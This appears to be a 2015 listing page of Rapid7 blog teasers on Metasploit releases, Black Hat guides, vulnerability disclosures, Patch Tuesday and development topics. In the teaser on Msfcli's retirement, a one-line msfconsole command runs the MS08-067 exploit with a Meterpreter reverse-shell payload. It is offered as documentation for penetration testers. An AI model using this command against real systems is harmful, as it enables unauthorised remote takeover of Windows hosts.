All Posts

6 min Metasploit

Interning at Rapid7: A "git push" in the Right Direction

How I Got Here Hey there! My name is Mo. I'm currently an intern here at Rapid7 working in the Austin office as part of the Metasploit team. If you came here expecting a deep understanding of Metasploit, this blog post isn't the right place. If you ARE interested in knowing what it's like to be a small town college student working at a leading firm in security engineering, then keep reading! Everyone used to tell me that every mistake and failure was a push in the right direction, but that

1 min Legal

Rapid7's Comments on the Wassenaar Arrangement Proposed Rule

For the past two months, the Department of Commerce's Bureau of Industry and Security (BIS) has been running a public consultation to solicit feedback on its proposal for implementing export controls for intrusion software under the Wassenaar Arrangement. You can read about the proposal and Rapid7's initial thoughts here. The consultation window closed on Monday, July 20th

3 min Metasploit Weekly Wrapup

Weekly Metasploit WrapUp: A Wild Committer Appears!

Browser Autopwn Version 2 Hey all! If you haven't been following the Metasploit development over the last few weeks, you know that we've been pretty busy getting Browser Autopwn Version 2 (BAPv2) out the door and into Metasploit Framework. This project was, and is, driven by our own beloved Wei _sinn3r Chen, and it's one of those projects around here that I'm really personally very excited about. If you want to jump into all the implementation details and history,

5 min Events

The Black Hat Attendee Guide Part 5 - Meaningful Introductions

If you are just joining us, this is the fifth post in the series starting here. Making An Introduction I might be wrong, but I'll argue that networking is a transitive verb, so ENGAGE! The real magic starts happening as you progress: * Level 1 -- Start with a “Hi, my name is…” Yes, it's that simple, thanks to Slim Shady * Level 2 -- Demonstrate that you have an idea of the world the other person live

2 min IT Ops

Playing with Java 8's Completable Futures

Of the many additions to Java 8 such as the Stream API and lambdas, I noticed one of the lesser talked about ones was CompletableFutures. So I decided to have a play around with them on the last Java component I wrote. My use case in a nutshell was piping larg

1 min Patch Tuesday

Oracle Java JRE AES Intrinsics Remote Denial of Service (CVE-2015-2659)

Java 8 server versions prior to u46 are susceptible to a remote unauthenticated denial of service (hard crash) when used with AES intrinsics (AES-NI) CPU extensions on supported processors. AES intrinsics are enabled by default on the Oracle JVM if the JVM detects that processor capability, which is common for modern processors manufactured after 2010. For more on AES-NI, see the Wikipedia article. This issue was tracked in the OpenJDK p

6 min

The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 2

Hello again, Welcome back! So yesterday we did an introduction about the brand new Browser Autopwn 2; if you have not read that, make sure to check it out. And today, let's talk about how to use it and what you can do with it for better vulnerability validation and penetration testing. As we explained in the previous blog post, Browser Autopwn 2 is a complete redesign from the firs

2 min

Patch Tuesday, July 2015

Administrators and security teams are in for a hectic week tackling 14 Microsoft security bulletins, 2 Adobe updates addressing 4 CVEs for Flash\Shockwave and Oracle has released their quarterly update for 63 of their product suites (including Java, Oracle DB, MySQL and Solaris). Of the 14 Microsoft security bulletins, 4 re

7 min Events

The Black Hat Attendee Guide Part 2 - The Briefings

If you are just joining us, this is the second post in the series starting here. Content is king. Research is what binds us, and you should not be surprised that some of the best in the game focus their annual research calendar on the Black Hat USA CFP. Offensive security research is the tail that wags the dog—many vendors and architects spend the year trying to get back in front of some of the bombs dropped at Black Hat each year. There's a

4 min

The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 1

Hi everyone, Today, I'd like to debut a completely rewritten new cool toy for Metasploit: Browser Autopwn 2. Browser Autopwn is the easiest and quickest way to explicitly test browser vulnerabilities without requiring the user to painfully learn everything there is about each exploit and the remote target before deployment. In this blog post, I will provide an introduction to the tool. And then in my next one, I will explain how you can take advantage of it to maximize your vuln validation or pen

7 min

Web Application Security Scanning and the Art of Automation

A version of this blog was originally posted on Nov. 5, 2012. Few people fully appreciate the difficulty in creating a web application security scanner that can actually work well against most sites. In addition, there is much debate about how much application security testing can be automated and how much needs to be done by human hands. Let's look at a recent conversation among some industry exp

3 min Events

The Black Hat Attendee Guide, Part 1 - How to Survive Black Hat

If you're like me, you have wanted to go to Black Hat for ages. If you're going, have a game plan. For first timers, this series will be a primer full of guidance and survival tips. For returning attendees, this will help maximize your experience at Black Hat. First, I want to give you perspective on my bias, coloring guidance offered here. My slant is that of someone who was a booth babe (sales engineer), a speaker, an attendee, Review Board member and former Gen

4 min Vulnerability Disclosure

R7-2015-08: Accellion File Transfer Appliance Vulnerabilities (CVE-2015-2856, CVE-2015-2857)

This disclosure covers two issues discovered with the Accellion File Transfer Appliance, a device used for secure enterprise file transfers. Issue R7-2015-08.1 is a remote file disclosure vulnerability, and issue R7-2015-08.2 is a remote command execution vulnerability. Metasploit modules have been released for both issues, as of Pull Request 5694. According to the vendor, both issues were addressed in version

1 min

Msfcli is No Longer Available in Metasploit

Hi everyone, This January, we made an announcement about the deprecation of Msfcli, the command line interface version for Metasploit. Today we are ready to say good-bye to it. Instead of Msfcli, we recommend using the -x option in Msfconsole. For example, here's how you can run MS08-067 in one line: ./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST ; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ; run" You can also leverage things like resource scripts o

4 min IT Ops

Ditch the Debugger and Use Log Analysis Instead

This guest blog post is written by Matthew Skelton, Co-founder and Principal Consultant at Skelton Thatcher Consulting. Summary: As a Developer, you cannot attach the debugger to your application in Production, but you can use logging in a way that helps you easily diagnose problems in both development AND Production. You also get to make friends with Operations people – win! The applications we’re developing and